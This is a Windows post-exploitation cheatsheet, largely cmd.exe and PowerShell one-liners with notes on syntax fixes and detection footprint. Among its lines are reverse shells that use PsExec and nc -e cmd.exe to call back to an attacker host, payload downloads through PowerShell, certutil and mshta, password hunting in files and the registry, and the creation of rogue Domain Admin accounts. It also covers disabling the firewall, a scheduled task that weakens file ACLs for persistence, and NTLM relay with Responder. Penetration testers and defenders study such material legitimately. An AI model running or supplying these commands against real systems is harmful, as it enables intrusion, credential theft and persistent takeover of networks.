======
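:: Windows host enumeration / post-exploitation cheatsheet. cmd.exe syntax unless a line is
:: marked PowerShell or Python. Placeholders: <user>, <pass>, <pid>, <service_name>, <URL>,
:: <ip-addr>, <path>. 10.11.0.187 is the attacker host in the examples.
:: OPSEC: with process command-line auditing enabled (event 4688 / Sysmon 1) every line below is
:: recorded verbatim, including any password passed on the command line.
:: Several lines were garbled by markdown rendering in the original (eaten '*', '_' and '\'
:: characters, merged commands); those are repaired here and marked with a comment.

:: ---- Host / user context ----
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
ver
echo %username%
whoami /all
:: Dump all environment variables (original line "SET U All" was garbled; bare 'set' is the usual intent).
set

:: ---- Account manipulation (logged as 4720/4732 locally, 4720/4728 on the DC) ----
net user <user> <password> /add
net localgroup administrators <user> /add
net group "HR Admins" myUser /add /domain

:: ---- Network ----
ipconfig /all
route print
arp -a
netstat -ano
netstat -ano -p TCP
:: The legacy 'netsh firewall' context is deprecated and absent on newer builds; prefer advfirewall.
netsh firewall show state
netsh firewall show config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
:: Disables the host firewall on every profile: needs admin, is logged (4950/4954) and very visible.
netsh advfirewall set allprofiles state off
net view
net users
net user user1
net config

:: ---- Scheduled tasks, processes, services, drivers ----
schtasks /query /fo LIST /v
SCHTASKS /Delete /TN SERVERQR /F
:: Persistence + ACL weakening: a recurring task granting Everyone full control over *.exe in
:: C:\Windows\Fonts. Fixed from the original: the path separator before *.exe was missing.
:: 'echo Y|' answers cacls' "Are you sure" prompt non-interactively.
SCHTASKS /create /tn SERVERQR /sc DAILY /mo 365 /tr "cmd /c echo Y|cacls C:\Windows\Fonts\*.exe /G everyone:f"
tasklist /SVC
taskkill /PID <pid>
taskkill /F /IM wscript.exe
net start
sc qc <service_name>
:: sc's parser requires the form 'option= value' (space after '='); the original was truncated.
sc queryex type= service state= all
DRIVERQUERY
:: PowerShell: tabular driver list.
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
:: PowerShell. Fixed: class is Win32_PnPSignedDriver, pipeline variable is $_, and -like needs
:: wildcards to do a substring match (all three lost to markdown in the original).
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName,DriverVersion,Manufacturer | ?{$_.DeviceName -like "*XBox*"}

:: ---- File and credential hunting ----
dir /a /s /b c:\*.pdf
dir /a /b c:\windows\kb*
:: Recursive (/s), case-insensitive (/i) search of the current directory tree for "password".
findstr /si password *.txt *.xml *.xls *.ini *.inf
dir /s *pass* == *cred* == *vnc* == *.config*
:: Three independent queries: chain with '&', not '|' (reg query does not read stdin, so the
:: original pipeline only ever ran the last one).
reg query HKLM /f password /t REG_SZ /s & reg query HKCU /f password /t REG_SZ /s & reg query HKLM /v password /t REG_SZ /s
dir \\IP.ADD.RE.SS\C$
mountvol
:: AlwaysInstallElevated: only exploitable when the value is 1 under BOTH of these keys.
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
:: AD query tool (e.g. 'dsquery user', 'dsquery computer'); present on domain-joined hosts with RSAT.
dsquery
runas /u:Administrator cmd.exe
:: Append '| clip' to any command to copy its stdout to the clipboard.
<command> | clip
cacls "<Program File>"
icacls <path>
:: /q shows the owner of each entry.
dir /q
explorer.exe http://10.11.0.187/index.html
wmic qfe get Caption,Description,HotFixID,InstalledOn
:: WQL string literals treat '\' as an escape character, so the path needs doubled backslashes.
wmic process where "ExecutablePath='C:\\Windows\\Fonts\\svhost.exe'" delete

:: ---- Downloads and remote execution ----
:: 'wget' here is the PowerShell alias for Invoke-WebRequest, not GNU wget.
powershell -command "& {&'wget' http://10.11.0.187/shell.exe -OutFile shell.exe}"
:: PsExec with explicit credentials: the password is exposed in argv and 4688 logs.
:: nc argument order is <host> <port>; -e hands the listener a cmd.exe.
PsExec.exe /accepteula -u <user> -p <pass> nc.exe -nv 10.11.0.187 8888 -e cmd.exe
:: -s runs as SYSTEM, -i interactive, -d does not wait for the process to finish.
PsExec.exe /accepteula -i -d -s nc.exe -nv 10.11.0.187 8889 -e cmd.exe
:: PowerShell:
Invoke-WebRequest -uri <URL> -OutFile C:\Windows\TEMP\outfile.txt

:: ---- Permission auditing (Sysinternals accesschk / autorunsc) ----
accesschk.exe /accepteula
:: -u suppress errors, -w writable only, -s recurse.
accesschk.exe -uws "Everyone" "C:\Program Files"
Autorunsc.exe /accepteula
C:\Users\Public\accesschk64.exe /accepteula *
:: Service permissions (-p), verbose, quiet.
accesschk.exe -vqp *
:: Directories (-d) writable by the given principal.
accesschk.exe -uwdqs users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
:: Fixed from the original: the path needs its separator (c:\*.*).
accesschk.exe -uwqs users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
cacls "c:\Program Files" /T | findstr Users

:: ---- Misc ----
:: Sinkholes a mining pool via the hosts file: needs admin, and this file is commonly monitored.
echo 127.0.0.1 my.crypto-pool.info >> %WINDIR%\system32\drivers\etc\hosts
takeown /F file.txt
:: Start the Metasploit handler (exploit/windows/misc/hta_server) first, then run this on the target:
mshta.exe //<ip-addr>/random.hta
:: Drop locations that are typically writable by a standard user (verify with accesschk above):
::   C:\Windows\Temp
::   %USERPROFILE%\AppData\Local\

:: ---- WMIC ----
wmic group list brief
wmic qfe list brief
wmic desktop list brief
wmic cdrom list brief
wmic nic list brief
wmic product get name,version,vendor
wmic process get name,processid
wmic /node:localhost process call create "C:\file.exe"
wmic process where processid="1000" call terminate
:: Remote credentials in argv (see OPSEC note at the top).
wmic /node:localhost /user:rambo /password:FirstBl00dPart3 process where name="paint.exe" call terminate
:: Enables RDP on a remote host. Fixed from the original: stray leading '-' and the space after
:: '/password:' (which made "password" a separate argument).
wmic /node:"servername" /user:"user@domain" /password:"password" RDToggle where ServerName="server name" call SetAllowTSConnections 1
:: Batch-file form: %%A is supplied by an enclosing FOR loop. The '|' before MORE was missing.
wmic /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv | MORE /E +2 >> SRVSPACE.CSV
wmic logicaldisk get name,providername
:: Fixed: 'net view' (not 'new view') and UNC paths need a leading '\\'.
net view \\COMPUTERNAME
net use Z: \\HOSTNAME\SHARE /PERSISTENT:YES
wmic startup get caption,command,user
:: Fixed: wmic's switch is /user:, not /username:.
wmic /node:remotehost /user:rambo /password:FirstBl00dPart3 service where name="LanManServer" get caption,name,status,started
:: LOLBin download; -urlcache leaves a record of the fetch in certutil's cache.
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
:: Office URI handler fetching a remote macro-enabled template (.dotm).
"C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe" "ms-word:nft|u|https://url/doc.dotm"
autorunsc.exe -x > autoruns.xml
autorunsc.exe -m -v
auditpol /get /category:*
:: Changing audit policy needs admin and itself generates event 4719.
auditpol /set /subcategory:"Logon" /success:enable

:: ---- Domain ----
net user /domain
net group /domain
:: Two separate commands (the original fused them onto one line, so the second never ran).
:: Creating a Domain Admin is about as noisy as it gets (4720 followed by 4728 on the DC).
net user h00p password /add /domain
net group "Domain Admins" h00p /add /domain
:: PowerShell (ADSI): list user objects; samAccountType 805306368 = SAM_NORMAL_USER_ACCOUNT.
:: $searchstr was undefined in the original; any LDAP path works because SearchRoot is
:: overwritten with the default naming context on the next lines. Filter needs its parentheses.
$searchstr = "LDAP://DC=corp,DC=local"
$ldapsearch = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchstr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$ldapsearch.SearchRoot = $objDomain
$ldapsearch.filter = "(samAccountType=805306368)"
$ldapsearch.FindAll()
:: PowerView (PowerShell). The session cmdlet is Get-NetSession (singular) in PowerView.
Get-NetLoggedon -ComputerName foobar
Get-NetSession -ComputerName dc02
:: Responder toolkit, run from the attacker box. MultiRelay only works against targets without
:: SMB signing enforced, and Responder's own SMB/HTTP servers must be disabled while it runs.
python MultiRelay.py -t 192.168.11.17 -u ALL
python RunFinger.py -i 192.168.0.0/24
python Responder.py -I eth0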